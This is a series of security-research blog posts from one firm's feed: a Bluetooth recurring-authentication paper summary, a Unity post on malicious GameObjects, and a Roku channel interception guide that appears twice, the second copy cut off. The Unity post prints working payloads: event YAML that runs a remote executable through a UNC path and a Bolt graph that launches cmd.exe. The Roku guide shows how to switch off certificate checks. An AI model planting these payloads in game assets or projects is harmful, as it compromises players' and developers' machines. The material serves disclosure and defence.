And finally, while this post has covered vulnerabilities in a lot of cheaper devices, sometimes the more expensive ones can be just as vulnerable. Doing a little research can go a long way towards making informed choices. We hope this post helps illustrate just how vulnerable some of these devices can be.

The post Drive-By Compromise: A Tale Of Four Wifi Routers appeared first on Include Security Research Blog.

Issues with Indefinite Trust in Bluetooth

25 August 2021 at 14:37

At IncludeSec we of course love to hack things, but we also love to use our skills and insights into security issues to explore innovative solutions, develop tools, and share resources. In this post we share a summary of a recent paper that I published with fellow researchers in the ACM Conference on Security and Privacy in Wireless and Mobile Networks (WiSec’21). WiSec is a conference well attended by people across industry, government, and academia; it is dedicated to all aspects of security and privacy in wireless and mobile networks and their applications, mobile software platforms, Internet of Things, cyber-physical systems, usable security and privacy, biometrics, and cryptography. 

Overview

Recurring Verification of Interaction Authenticity Within Bluetooth Networks
Travis Peters (Include Security), Timothy Pierson (Dartmouth College), Sougata Sen (BITS GPilani, KK Birla Goa Campus, India), José Camacho (University of Granada, Spain), and David Kotz (Dartmouth College)

The most common forms of authentication are passwords, potentially used in combination with a second factor such as a hardware token or mobile app (i.e., two-factor authentication). These approaches emphasize a one-time, initial authentication. After initial authentication, authenticated entities typically remain authenticated until an explicit deauthentication action is taken, or the authenticated session expires. Unfortunately, explicit deauthentication happens rarely, if ever. To address this issue, recent work has explored how to provide passive, continuous authentication and/or automatic de-authentication by correlating user movements and inputs with actions observed in an application (e.g., a web browser). 

The issue with indefinite trust, however, goes beyond user authentication. Consider devices that pair via Bluetooth, which commonly follow the pattern of pair once, trust indefinitely. After two devices connect, those devices are bonded until a user explicitly removes the bond. This bond is likely to remain intact as long as the devices exist, or until they transfer ownership (e.g., sold or lost).

The increased adoption of (Bluetooth-enabled) IoT devices and reports of the inadequacy of their security makes indefinite trust of devices problematic. The reality of ubiquitous connectivity and frequent mobility gives rise to a myriad of opportunities for devices to be compromised. Thus, I put forth the argument with my academic research colleagues that one-time, single-factor, device-to-device authentication (i.e., an initial pairing) is not enough, and that there must exist some mechanism to frequently (re-)verify the authenticity of devices and their connections.

In our paper we propose a device-to-device recurring authentication scheme – Verification of Interaction Authenticity (VIA) – that is based on evaluating characteristics of the communications (interactions) between devices. We adapt techniques from wireless traffic analysis and intrusion detection systems to develop behavioral models that capture typical, authentic device interactions (behavior); these models enable recurring verification of device behavior.

Technical Highlights

  • Our recurring authentication scheme is based on off-the-shelf machine learning classifiers (e.g., Random Forest, k-NN) trained on characteristics extracted from Bluetooth/BLE network interactions. 
  • We extract model features from packet headers and payloads. Most of our analysis targets lower-level Bluetooth protocol layers, such as the HCI and L2CAP layers; higher-level BLE protocols, such as ATT, are also information-rich protocol layers. Hybrid models – combining information extracted from various protocol layers – are more complex, but may yield better results.
  • We construct verification models from a combination of fine-grained and coarse-grained features, including n-grams built from deep packet inspection, protocol identifiers and packet types, packet lengths, and packet directionality (ingress vs. egress). 
Our verification scheme can be deployed anywhere that interposes on Bluetooth communications between two devices. One example we consider is a deployment within a kernel module running on a mobile platform.

Other Highlights from the Paper 

  • We collected and presented a new, first-of-its-kind Bluetooth dataset. This dataset captures Bluetooth network traces corresponding to app-device interactions between more than 20 smart-health and smart-home devices. The dataset is open-source and available within the VM linked below.
  • We enhanced open-source Bluetooth analysis software – bluepy and btsnoop – in an effort to improve the available tools for practical exploration of the Bluetooth protocol and Bluetooth-based apps.
  • We presented a novel modeling technique, combined with off-the-shelf machine learning classifiers, for characterizing and verifying authentic Bluetooth/BLE app-device interactions.
  • We implemented our verification scheme and evaluated our approach against a test corpus of 20 smart-home and smart-health devices. Our results show that VIA can be used for verification with an F1-score of 0.86 or better in most test cases.

To learn more, check out our paper as well as a VM pre-loaded with our code and dataset

Final Notes

Reproducible Research

We are advocates for research that is impactful and reproducible. At WiSec’21 our published work was featured as one of four papers this year that obtained the official replicability badges. These badges signify that our artifacts are available, have been evaluated for accuracy, and that our results were independently reproducible. We thank the ACM the WiSec organizers for working to make sharing and reproducibility common practice in the publication process. 

Next Steps

In future work we are interested in exploring a few directions:

  • Continue to enhance tooling that supports Bluetooth protocol analysis for research and security assessments
  • Expand our dataset to include more devices, adversarial examples, etc. 
  • Evaluate a real-world deployment (e.g., a smartphone-based multifactor authentication system for Bluetooth); such a deployment would enable us to evaluate practical issues such as verification latency, power consumption, and usability. 

Give us a shout if you are interested in our team doing bluetooth hacks for your products!

The post Issues with Indefinite Trust in Bluetooth appeared first on Include Security Research Blog.

Hacking Unity Games with Malicious GameObjects

At IncludeSec our clients are asking us to hack on all sorts of crazy applications from mass scale web systems to IoT devices and low-level firmware. Something that we’re seeing more of is hacking virtual reality systems and mass scale video games so we had a chance to do some research and came up with a bit of a novel approach which may allow attacking Unity-powered games and game devs.

Specifically, this post will outline:

  • Two ways I found that GameObjects (a non-code asset type) can be crafted to cause arbitrary code to run.
  • Five possible ways an attacker might use a malicious GameObject to compromise a Unity game.
  • How game developers can mitigate the risk.

Unity has also published their own blog post on this subject, they’ve been great to work with and continue to make moves internally to maximize the security of their platform. Be sure to check that post out for specific recommendations on how to protect against this sort of vulnerability.

Terminology

First a brief primer on the terms I’m going to use for those less familiar with Unity.

  • GameObjects are entities in Unity that can have any number of components attached.
  • Components are added to GameObjects to make them do things. They include Unity built-in components, like UI elements and sprite renderers, as well as custom scripted components used to build the game logic.
  • Assets are the elements that make up the game. This includes images, sounds, scripts, and GameObjects, among other things.
  • AssetBundles are a way to package non-code assets and allow them to be loaded at runtime (from the web or locally). They are used to decrease initial download size, allow downloadable content, as well as sometimes to enable modding of the game.

Ways a malicious GameObject could get into a game

Before going into details about how a GameObject could execute code, let’s talk about how it would get in the game in the first place so that we’re clear on the attack scenarios. I came up with five ways a malicious GameObject might find its way into a Unity game:

Way 1: the most obvious route is if the game developer downloaded it and added it to the game project. This might be an asset they purchased on the Unity Asset Store, or something they found on GitHub that solved a problem they were having.

Way 2: Unity AssetBundles allow non-script assets (including GameObjects) to be imported into a game at runtime. There may be an assumption that these assets are safe, since they contain no custom script assets, but as you’ll see further into the post that is not a safe assumption. For example, sometimes AssetBundles are used to add modding functionality to a game. If that’s the case, then third-party mods downloaded by a user can unexpectedly cause code execution, similar to running untrusted programs from the internet.

Way 3: AssetBundles can be downloaded from the internet at runtime without transport encryption enabling man-in-the-middle attacks. The Unity documentation has an example of how to do this, partially listed below:

UnityWebRequest uwr = UnityWebRequestAssetBundle.GetAssetBundle("http://www.my-server.com/mybundle")

In the Unity-provided example, the AssetBundle is being downloaded over HTTP. If an AssetBundle is downloaded over HTTP (which lacks the encryption and certificate validation of HTTPS), an attacker with a man-in-the-middle position of whoever is running the game could tamper with the AssetBundle in transit and replace it with a malicious one. This could, for example, affect players who are playing on an untrusted network such as a public WiFi access point.

Way 4: AssetBundles can be downloaded from the internet at runtime with transport encryption but man-in-the-middle attacks might still be possible.

Unity has this to say about certificate validation when using UnityWebRequests:

Some platforms will validate certificates against a root certificate authority store. Other platforms will simply bypass certificate validation completely.

According to the docs, even if you use HTTPS, on certain platforms Unity won’t check certificates to verify it’s communicating with the intended server, opening the door for possible AssetBundle tampering. It’s possible to create your own certificate handler, but only on specific platforms:

Note: Custom certificate validation is currently only implemented for the following platforms – Android, iOS, tvOS and desktop platforms.

I could not find information about which platforms “bypass certificate validation completely”, but I’m guessing it’s the less-common ones? Still, if you’re developing a game that downloads AssetBundles, you might want to verify that certificate validation is working on the platforms you use.

Way 5: Malicious insider. A contributor on a development team or open source project wants to add some bad code to a game. But maybe the dev team has code reviews to prevent this sort of thing. Likely, those code reviews don’t extend to the GameObjects themselves, so the attacker smuggles their code into a GameObject that gets deployed with the game.

Crafting malicious GameObjects

I think it’s pretty obvious why you wouldn’t want arbitrary code running in your game — it might compromise players’ computers, steal their data, crash the game, etc. If the malicious code runs on a development machine, the attacker could potentially steal the source code or pivot to attack the studio’s internal network. Peter Clemenko had another interesting perspective on his blog: essentially, in the near-future augmented-reality cyberpunk ready-player-1 upcoming world an attacker may seek to inject things into a user’s reality to confuse, distract, annoy, and that might cause real-world harm.

So, how can non-script assets get code execution?

Method 1: UnityEvents

Unity has an event system that allows hooking up delegates in code that will be called when an event is triggered. You can use them in your custom scripts for game-specific events, and they are also used on Unity’s built-in UI components (such as Buttons) for event handlers (like onClick) . Additionally, you can add ones to objects such as PointerClick, PointerEnter, Scroll, etc. using an EventTrigger component

One-parameter UnityEvents can be exposed in the inspector by components. In normal usage, setting up a UnityEvent looks like this in the Unity inspector:

First you have to assign a GameObject to receive the event callback (in this case, “Main Camera”). Then you can look through methods and properties on any components attached to that GameObject, and select a handler method.

Many assets in Unity, including scenes and GameObject prefabs, are serialized as YAML files that store the various properties of the object. Opening up the object containing the above event trigger, the YAML looks like this:

MonoBehaviour:
  m_ObjectHideFlags: 0
  m_CorrespondingSourceObject: {fileID: 0}
  m_PrefabInstance: {fileID: 0}
  m_PrefabAsset: {fileID: 0}
  m_GameObject: {fileID: 1978173272}
  m_Enabled: 1
  m_EditorHideFlags: 0
  m_Script: {fileID: 11500000, guid: d0b148fe25e99eb48b9724523833bab1, type: 3}
  m_Name:
  m_EditorClassIdentifier:
  m_Delegates:
  - eventID: 4
    callback:
      m_PersistentCalls:
        m_Calls:
        - m_Target: {fileID: 963194228}
          m_TargetAssemblyTypeName: UnityEngine.Component, UnityEngine
          m_MethodName: SendMessage
          m_Mode: 5
          m_Arguments:
            m_ObjectArgument: {fileID: 0}
            m_ObjectArgumentAssemblyTypeName: UnityEngine.Object, UnityEngine
            m_IntArgument: 0
            m_FloatArgument: 0
            m_StringArgument: asdf
            m_BoolArgument: 0
          m_CallState: 2

The most important part is under m_Delegates — that’s what controls which methods are invoked when the event is triggered. I did some digging in the Unity C# source repo along with some experimenting to figure out what some of these properties are. First, to summarize my findings: UnityEvents can call any method that has a return type void and takes zero or one argument of a supported type. This includes private methods, setters, and static methods. Although the UI restricts you to invoking methods available on a specific GameObject, editing the object’s YAML does not have that restriction — they can call any method in a loaded assembly . You can skip to exploitation below if you don’t need more details of how this works.

Technical details

UnityEvents technically support delegate functions with anywhere from zero to four parameters, but unfortunately Unity does not use any UnityEvents with greater than one parameter for its built-in components (and I found no way to encode more parameters into the YAML). We are therefore limited to one-parameter functions for our attack.

The important fields in the above YAML are:

  • eventID — This is specific to EventTriggers (rather than UI components.) It specifies the type of event, PointerClick, PointerHover, etc. PointerClick is “4”.
  • m_TargetAssemblyTypeName — this is the fully qualified .NET type name that the event handler function will be called on. Essentially this takes the form: namespace.typename, assemblyname. It can be anything in one of the assemblies loaded by Unity, including all Unity engine stuff as well as a lot of .NET stuff.
  • m_callstate — Determines when the event triggers — only during a game, or also while using the Unity Editor:
    • 0 – UnityEventCallState.Off
    • 1 – UnityEventCallState.EditorAndRuntime
    • 2 – UnityEventCallState.RuntimeOnly
  • m_mode — Determines the argument type of the called function.
    • 0 – EventDefined
    • 1 – Void,
    • 2 – Object,
    • 3 – Int,
    • 4 – Float,
    • 5 – String,
    • 6 – Bool
  • m_target — Specify the Unity object instance that the method will be called on. Specifying m_target: {fileId: 0} allows static methods to be called.

Unity uses C# reflection to obtain the method to call based on the above. The code ultimately used to obtain the method is shown below:

objectType.GetMethod(functionName, BindingFlags.Public | BindingFlags.NonPublic | BindingFlags.Instance | BindingFlags.Static, null, argumentTypes, null);

With the binding flags provided, it’s possible to specify private or public methods, static or instance methods. When calling the function, a delegate is created with type UnityAction that has a return type of void — therefore, the specified function must have a void return type.

Exploitation

My goal after discovering the above was to find some method available in the default loaded assemblies fitting the correct form (static, return void, exactly 1 parameter) which would let me do Bad Things™. Ideally, I wanted to get arbitrary code execution, but other things could be interesting too. If I could hook up an event handler to something dangerous, we would have a malicious GameObject.

I was quickly able to get arbitrary code execution on Windows machines by invoking Application.OpenURL() with a UNC path pointing to a malicious executable on a network share. The attacker would host a malicious exe file, and wait for the game client to trigger the event. OpenURL will then download and execute the payload. 

Below is the event definition I used  in the object YAML:

- m_Target: {fileID: 0}
  m_TargetAssemblyTypeName: UnityEngine.Application, UnityEngine
  m_MethodName: OpenURL
  m_Mode: 5
  m_Arguments:
    m_ObjectArgument: {fileID: 0}
    m_ObjectArgumentAssemblyTypeName: UnityEngine.Object, UnityEngine
    m_IntArgument: 0
    m_FloatArgument: 0
    m_StringArgument: file://JASON-INCLUDESE/shared/calc.exe
    m_BoolArgument: 0
  m_CallState: 2

It sets an OnPointerClick handler on an object with a large bounding box (to ensure it gets triggered). When the victim user clicks, it retrieves calc.exe from a network share and executes it. In a hypothetical attack the exe file would likely be on the internet, but I hosted on my local network. Here’s a gif of what happens when you click the object:

This got arbitrary code execution on Windows from a malicious GameObject either in an AssetBundle or included in the project. However, the network drive method won’t work on non-Windows platforms unless they’ve specifically mounted a share, since they don’t automatically open UNC paths. What about those platforms?

Another interesting function is EditorUtility.OpenWithDefaultApp(). It takes a string path to a file, and opens it up with the system’s default app for this file type. One useful part is that it takes relative paths in the project. An attacker who can get malicious executables into your project can call this function with the relative path to their executable to get them to run.

For example, on macOS I compiled the following C program which writes “hello there” to /tmp/hello:

#include <stdio.h>;
int main() {
  FILE* fp = fopen("/tmp/hello");
  fprintf(fp, "hello there");
  fclose(fp);
  return 0;
}

I included the compiled binary in my Assets folder as “hello” (no extension — this is important!) Then I set up the following onClick event on a button:

m_OnClick:
  m_PersistentCalls:
    m_Calls:
    - m_Target: {fileID: 0}
      m_TargetAssemblyTypeName: UnityEditor.EditorUtility, UnityEditor
      m_MethodName: OpenWithDefaultApp
      m_Mode: 5
      m_Arguments:
        m_ObjectArgument: {fileID: 0}
        m_ObjectArgumentAssemblyTypeName: UnityEngine.Object, UnityEngine
        m_IntArgument: 0
        m_FloatArgument: 0
        m_StringArgument: Assets/hello
        m_BoolArgument: 0
      m_CallState: 2

It now executes the executable when you click the button:

This doesn’t work for AssetBundles though, because the unpacked contents of AssetBundles aren’t written to disk. Although the above might be an exploitation path in some scenarios, my main goal was to get code execution from AssetBundles, so I kept looking for methods that might let me do that on Mac (on Windows, it’s possible with OpenURL(), as previously shown). I used the following regex in SublimeText to search over the UnityCsReference repository for any matching functions that a UnityEvent could call: static( extern|) void [A-Za-z\w_]*\((string|int|bool|float) [A-Za-z\w_]*\)

After pouring over the 426 discovered methods, I fell a short of getting completely arbitrary code exec from AssetBundles on non-Windows platforms — although I still think it’s probably possible. I did find a bunch of other ways such a GameObject could do Bad Things™. This is just a small sampling:

Unity.CodeEditor.CodeEditor.SetExternalScriptEditor()Can change a user’s default code editor to arbitrary values. Setting it to a malicious UNC executable can achieve code execution whenever they trigger Unity to open a code editor, similar to the OpenURL exploitation path.
PlayerPrefs.DeleteAll()Delete all save games and other stored data.
UnityEditor.FileUtil.UnityDirectoryDelete()Invokes Directory.Delete() on the specified directory.
UnityEngine.ScreenCapture.CaptureScreenshot()Takes a screenshot of the game window to a specified file. Will automatically overwrite the specified file. Can be written to UNC paths in Windows.
UnityEditor.PlayerSettings.SetAdditionalIl2CppArgs()Add flags to be passed to the Il2Cpp compiler.
UnityEditor.BuildPlayerWindow.BuildPlayerAndRun()Trigger the game to build. In my testing I couldn’t get this to work, but combined with the Il2Cpp flag function above it could be interesting.
Application.Quit(), EditorApplication.Exit()Quit out of the game/editor.

Method 2: Visual scripting systems

There are various visual scripting systems for Unity that let you create logic without code. If you have imported one of these into your project, any third-party GameObject you import can use the visual scripting system. Some of the systems are more powerful or less powerful. I will focus on Bolt as an example since it’s pretty popular, Unity acquired it, and it’s now free. 

This attack vector was proposed on Peter Clemenko’s blog I mentioned earlier, but it focused on malicious entity injection — I think it should be clarified that, using Bolt, it’s possible for imported GameObjects to achieve arbitrary code execution as well, including shell command execution.

With the default settings, Bolt does not show many of the methods available to you in the loaded assemblies in its UI. Once again, though, you have more options if you edit the YAML than you do in the UI. For example, if you make a simple Bolt flow graph like the following:

The YAML looks like:

MonoBehaviour:
  m_ObjectHideFlags: 0
  m_CorrespondingSourceObject: {fileID: 0}
  m_PrefabInstance: {fileID: 0}
  m_PrefabAsset: {fileID: 0}
  m_GameObject: {fileID: 2032548220}
  m_Enabled: 1
  m_EditorHideFlags: 0
  m_Script: {fileID: -57143145, guid: a040fb66244a7f54289914d98ea4ef7d, type: 3}
  m_Name:
  m_EditorClassIdentifier:
  _data:
    _json: '{"nest":{"source":"Embed","macro":null,"embed":{"variables":{"collection":{"$content":[],"$version":"A"},"$version":"A"},"controlInputDefinitions":[],"controlOutputDefinitions":[],"valueInputDefinitions":[],"valueOutputDefinitions":[],"title":null,"summary":null,"pan":{"x":117.0,"y":-103.0},"zoom":1.0,"elements":[{"coroutine":false,"defaultValues":{},"position":{"x":-204.0,"y":-144.0},"guid":"a4dcd43b-833d-49f5-8642-b6c311cf324f","$version":"A","$type":"Bolt.Start","$id":"10"},{"chainable":false,"member":{"name":"OpenURL","parameterTypes":["System.String"],"targetType":"UnityEngine.Application","targetTypeName":"UnityEngine.Application","$version":"A"},"defaultValues":{"%url":{"$content":"https://includesecurity.com","$type":"System.String"}},"position":{"x":-59.0,"y":-145.0},"guid":"395d9bac-f1da-4173-9e4b-b19d156c9a0b","$version":"A","$type":"Bolt.InvokeMember","$id":"12"},{"sourceUnit":{"$ref":"10"},"sourceKey":"trigger","destinationUnit":{"$ref":"12"},"destinationKey":"enter","guid":"d9cae7fd-e05b-48c6-b16d-5f04b0c722a6","$type":"Bolt.ControlConnection"}],"$version":"A"}}}'
    _objectReferences: []

The _json field seems to be where the meat is. Un-minifying it and focusing on the important parts:

[...]
  "member": {
    "name": "OpenURL",
    "parameterTypes": [
        "System.String"
    ],
    "targetType": "UnityEngine.Application",
    "targetTypeName": "UnityEngine.Application",
    "$version": "A"
  },
  "defaultValues": {
    "%url": {
        "$content": "https://includesecurity.com",
        "$type": "System.String"
    }
  },
[...]

It can be changed from here to a version that runs arbitrary shell commands using System.Diagnostics.Process.Start:

[...]
{
  "chainable": false,
  "member": {
    "name": "Start",
    "parameterTypes": [
        "System.String",
        "System.String"
    ],
    "targetType": "System.Diagnostics.Process",
    "targetTypeName": "System.Diagnostics.Process",
    "$version": "A"
  },
  "defaultValues": {
    "%fileName": {
        "$content": "cmd.exe",
        "$type": "System.String"
    },
    "%arguments": {
         "$content": "/c calc.exe",
         "$type": "System.String"
    }
  },
[...]

This is what that looks like now in Unity:

A malicious GameObject imported into a project that uses Bolt can do anything it wants.

How to prevent this

Third-party assets

It’s unavoidable for many dev teams to use third-party assets in their game, be it from the asset store or an outsourced art team. Still, the dev team can spend some time scrutinizing these assets before inclusion in their game — first evaluating the asset creator’s trustworthiness before importing it into their project, then reviewing it (more or less carefully depending on how much you trust the creator). 

AssetBundles

When downloading AssetBundles, make sure they are hosted securely with HTTPS. You should also double check that Unity validates HTTPS certificates on all platforms your game runs — do this by setting up a server with a self-signed certificate and trying to download an AssetBundle from it over HTTPS. On the Windows editor, where certificate validation is verified as working, doing this creates an error like the following and sets the UnityWebRequest.isNetworkError property to true:

If the download works with no error, then an attacker could insert their own HTTPS server in between the client and server, and inject a malicious AssetBundle. 

If Unity does not validate certificates on your platform and you are not on one of the platforms that allows for custom certificate checking, you probably have to implement your own solution — likely integrating a different HTTP client that does check certificates and/or signing the AssetBundles in some way.

When possible, don’t download AssetBundles from third-parties. This is impossible, though, if you rely on AssetBundles for modding functionality. In that case, you might try to sanitize objects you receive. I know that Bolt scripts are dangerous, as well as anything containing a UnityEvent (I’m aware of EventTriggers and various UI elements). The following code strips these dangerous components recursively from a downloaded GameObject asset before instantiating:

private static void SanitizePrefab(GameObject prefab)
{
    System.Type[] badComponents = new System.Type[] {
        typeof(UnityEngine.EventSystems.EventTrigger),
        typeof(Bolt.FlowMachine),
        typeof(Bolt.StateMachine),
        typeof(UnityEngine.EventSystems.UIBehaviour)
    };

    foreach (var componentType in badComponents) {
        foreach (var component in prefab.GetComponentsInChildren(componentType, true)) {
            DestroyImmediate(component, true);
        }
    }
}

public static Object SafeInstantiate(GameObject prefab)
{
    SanitizePrefab(prefab);
    return Instantiate(prefab);
}

public void Load()
{
    AssetBundle ab = AssetBundle.LoadFromFile(Path.Combine(Application.streamingAssetsPath, "evilassets"));

    GameObject evilGO = ab.LoadAsset<GameObject>("EvilGameObject");
    GameObject evilBolt = ab.LoadAsset<GameObject>("EvilBoltObject");
    GameObject evilUI = ab.LoadAsset<GameObject>("EvilUI");

    SafeInstantiate(evilGO);
    SafeInstantiate(evilBolt);
    SafeInstantiate(evilUI);

    ab.Unload(false);
}

Note that we haven’t done a full audit of Unity and we pretty much expect that there are other tricks with UnityEvents, or other ways for a GameObject to get code execution. But the code above at least protects against all of the attacks outlined in this blog.

If it’s essential to allow any of these things (such as Bolt scripts) to be imported into your game from AssetBundles, it gets trickier. Most likely the developer will want to create a white list of methods Bolt is allowed to call, and then attempt to remove any methods not on the whitelist before instantiating dynamically loaded GameObjects containing Bolt scripts. The whitelist could be something like “only allow methods in the MyCompanyName.ModStuff namespace.”  Allowing all of the UnityEngine namespace would not be good enough because of things like Application.OpenURL, but you could wrap anything you need in another namespace. Using a blacklist to specifically reject bad methods is not recommended, the surface area is just too large and it’s likely something important will be missed, though a combination of white list and black list may be possible with high confidence.

In general game developers need to decide how much protection they want to add at the app layer vs. putting the risk decision in the hands of a game end-user’s own judgement on what mods to run, just like it’s on them what executables they download. That’s fair, but it might be a good idea to at least give the gamers a heads up that this could be dangerous via documentation and notifications in the UI layer. They may not expect that mods could do any harm to their computer, and might be more careful once they know.

As mentioned above, if you’d like to read more about Unity’s blog for this and their recommendations, be sure to check out their blog post!

The post Hacking Unity Games with Malicious GameObjects appeared first on Include Security Research Blog.

New School Hacks: Test Setup for Hacking Roku Channels Written in Brightscript

30 March 2021 at 18:00

We were recently asked by one of our clients (our day job at IncludeSec is hacking software of all types) to take a look at their Roku channel. For those unfamiliar Roku calls apps for their platform “channels”. We haven’t seen too many Roku channel security reviews and neither has the industry as there isn’t much public information about setting up an environment to conduct a security assessment of a Roku channel.

The purpose of this post was to be a practical guide rather than present any new 0day, but stay tuned to the end of the post for application security tips for Roku channel developers. Additionally we did run this post by the Roku security team and we thank them for taking the time to review our preview.

Roku channels are scripted in Brightscript, a scripting language created specifically for media heavy Roku channels that is very similar syntax wise to our old 90s friend Visual Basic. A sideloaded Roku channel is just a zip file containing primarily Brightscript code, XML documents describing application components, and media assets. These channels operate within a Sandbox similar to Android apps. Due to the architecture of a sandboxed custom scripting language, Roku channels’ access to Roku’s Linux-based operating system, and to other channels on the same Roku device is limited. Channels are encrypted and signed by the developer (on Roku hardware) and distributed through Roku’s infrastructure, so users generally don’t have access to channel packages unlike APKs on Android.

The Brightscript language as well as channel development are well documented by Roku. Roku hardware devices can be put in a developer mode by entering a cheat code sequence which enables sideloading as well as useful features such as a debugger and remote control over the network. You’ll need these features as they’ll be very useful when exploring attacks against Roku channels.

You’ll also want to use the Eclipse Brightscript plugin as it is very helpful when editing or auditing Brightscript code. If you have access to a channel’s source code you can easily import it into Eclipse by creating a new Eclipse project from the existing code, and use the plugin’s project export dialog to re-package the channel and install it to a local Roku device in development mode.

Getting Burp to Work With Brightscript

As with most embedded or mobile type of client applications one of the first things we do when testing a new platform that is interacting with the web is to get HTTP requests running through Burp Suite. It is incredibly helpful in debugging and looking for vulnerabilities to be able to intercept, inspect, modify, and replay HTTP requests to a backend API. Getting a Roku channel working through Burp involves redirecting traffic destined to the backed API to Burp instead, and disabling certificate checking on the client. Note that Roku does support client certificates but this discussion doesn’t involve bypassing those, we’ll focus on bypassing client-side checks of server certificates for channels where the source code is available which is the situation we have with IncludeSec’s clients.

Brightscript code that makes HTTP requests uses Brightscript’s roUrlTransfer object. For example, some code to GET example.com might look like this:

urlTransfer = CreateObject("roUrlTransfer")
urlTransfer.SetCertificatesFile("common:/certs/ca-bundle.crt")
urlTransfer.SetUrl("https://example.com/")<br>s = urlTransfer.GetToString()

To setup an easy intercept environment I like to use the create_ap script from https://github.com/lakinduakash/linux-wifi-hotspot to quickly and easily configure hostapd, dnsmasq, and iptables to set up a NAT-ed test network hosted by a Linux machine. There are many ways to perform the man-in-the-middle to redirect requests to Burp, but I’m using a custom hosts file in the dnsmasq configuration to redirect connections to the domains I’m interested in (in this case example.com) to my local machine, and an iptables rule to redirect incoming connections on port 443 to Burp’s listening port.


Here’s starting the WIFI AP:

# cat /tmp/test-hosts<br>192.168.12.1 example.com
# create_ap -e /tmp/test-hosts $AP_NETWORK_INTERFACE $INTERNET_NETWORK_INTERFACE $SSID $PASSWORD

And here’s the iptables rule:

# iptables -t nat -A PREROUTING -p tcp --src 192.168.12.0/24 --dst 192.168.12.1 --dport 443 -j REDIRECT --to-port 8085

In Burp’s Proxy -> Options tab, I’ll add the proxy listener listening on the test network ip on port 8085, configured for invisible proxying mode:

https://i0.wp.com/1.bp.blogspot.com/-k6-BJdBuClo/YCGaPd4k0uI/AAAAAAAAARs/TNGXncPqBLoIjt7dqlqLQqvnUwzDO5zogCLcBGAsYHQ/s2884/burp1.png?w=1200&ssl=1

Next, we need to bypass the HTTPS certificate check that will cause the connection to fail. The easiest way to do this is to set EnablePeerVerification to false:

urlTransfer = CreateObject("roUrlTransfer")
urlTransfer.SetCertificatesFile("common:/certs/ca-bundle.crt")
urlTransfer.EnablePeerVerification(false)
urlTransfer.SetUrl("https://example.com/")
s = urlTransfer.GetToString()

Then, re-build the channel and sideload it on to a Roku device in developer mode. Alternatively we can export Burp’s CA certificate, convert it to PEM format, and include that in the modified channel.

This converts the cert from DER to PEM format:

$ openssl x509 -inform der -in burp-cert.der -out burp-cert.pem

The burp-cert.pem file needs to be added to the channel zip file, and the code below changes the certificates file from the internal Roku file to the burp pem file:

urlTransfer = CreateObject("roUrlTransfer")
urlTransfer.SetCertificatesFile("pkg:/burp-cert.pem")
urlTransfer.SetUrl("https://example.com/")
s = urlTransfer.GetToString()

It’s easy to add the certificate file to the package when exporting and sideloading using the BrightScript Eclipse plugin:

https://i0.wp.com/1.bp.blogspot.com/-KQUykpVEqIo/YCGajAySThI/AAAAAAAAAR0/9TmpYDKEH7U-X00uyl23AB8pMgxYzwUawCLcBGAsYHQ/s1877/export1.png?w=1200&ssl=1

Now the request can be proxied and shows up in Burp’s history:

https://i0.wp.com/1.bp.blogspot.com/-4nxRsQ9d_eI/YCGannkRoNI/AAAAAAAAAR4/KPQGUnI6hv8ZpFUBiJ9HvrdW0XPwVG_kwCLcBGAsYHQ/s2048/burp-history1.png?w=1200&ssl=1

With that you’re off to the races inspecting and modifying traffic of your Roku channel assessment subject. All of your usual fat client/android app techniques for intercepting and manipulating traffic applies. You can combine that with code review of the BrightScript itself to hunt for interesting security problems and don’t discount privacy problems like unencrypted transport or over collection of data.

For BrightScript developers who may be worried about people using these types of techniques here are our top five tips for coding secure and privacy conscious channels:

  1. Only deploy what you need in a channel, don’t deploy debug/test code.
  2. Consider that confidentiality of the file contents of your deployed channel may not be a given. Don’t hard code secret URLs, tokens, or other security relevant info in your channel or otherwise an attacker will not have access to the client-side code.
  3. Don’t gather/store/send more personal information than is absolutely necessary and expected by your users.
  4. Encrypt all of your network connections to/from your channel and verify certificates. Nothing should ever be in plain text HTTP.
  5. Watch out for 3rd parties. User tracking and other personal data sent to 3rd parties can be come compliance and legal nightmares, avoid this and make your business aware of the possible ramifications if they chose to use 3rd parties for tracking.

Hopefully this post has been useful as a quick start for those interested in exploring the security of Roku channels and Brightscript code. Compared to other similar platforms, Roku is relatively locked down with it’s own scripting language and sandboxing. They also don’t have much user controllable input or a notable client-side attack surface area, but channels on Roku and apps on other platforms generally have to connect to backend web services, so running those connections through Burp is a good starting point to look for security and privacy concerns.

Further research into the Roku platform itself is also on the horizon…perhaps there will be a Part 2 of this post? 🙂

The post New School Hacks: Test Setup for Hacking Roku Channels Written in Brightscript appeared first on Include Security Research Blog.

New School Hacks: Test Setup for Hacking Roku Channels Written in Brightscript

30 March 2021 at 18:00

We were recently asked by one of our clients (our day job at IncludeSec is hacking software of all types) to take a look at their Roku channel. For those unfamiliar Roku calls apps for their platform “channels”. We haven’t seen too many Roku channel security reviews and neither has the industry as there isn’t much public information about setting up an environment to conduct a security assessment of a Roku channel.

The purpose of this post was to be a practical guide rather than present any new 0day, but stay tuned to the end of the post for application security tips for Roku channel developers. Additionally we did run this post by the Roku security team and we thank them for taking the time to review our preview.

Roku channels are scripted in Brightscript, a scripting language created specifically for media heavy Roku channels that is very similar syntax wise to our old 90s friend Visual Basic. A sideloaded Roku channel is just a zip file containing primarily Brightscript code, XML documents describing application components, and media assets. These channels operate within a Sandbox similar to Android apps. Due to the architecture of a sandboxed custom scripting language, Roku channels’ access to Roku’s Linux-based operating system, and to other channels on the same Roku device is limited. Channels are encrypted and signed by the developer (on Roku hardware) and distributed through Roku’s infrastructure, so users generally don’t have access to channel packages unlike APKs on Android.

The Brightscript language as well as channel development are well documented by Roku. Roku hardware devices can be put in a developer mode by entering a cheat code sequence which enables sideloading as well as useful features such as a debugger and remote control over the network. You’ll need these features as they’ll be very useful when exploring attacks against Roku channels.

You’ll also want to use the Eclipse Brightscript plugin as it is very helpful when editing or auditing Brightscript code. If you have access to a channel’s source code you can easily import it into Eclipse by creating a new Eclipse project from the existing code, and use the plugin’s project export dialog to re-package the channel and install it to a local Roku device in development mode.

Getting Burp to Work With Brightscript

As with most embedded or mobile type of client applications one of the first things we do when testing a new platform that is interacting with the web is to get HTTP requests running through Burp Suite. It is incredibly helpful in debugging and looking for vulnerabilities to be able to intercept, inspect, modify, and replay HTTP requests to a backend API. Getting a Roku channel working through Burp involves redirecting traffic destined to the backed API to Burp instead, and disabling certificate checking on the client. Note that Roku does support client certificates but this discussion doesn’t involve bypassing those, we’ll focus on bypassing client-side checks of server certificates for channels where the source code is available which is the situation we have with IncludeSec’s clients.

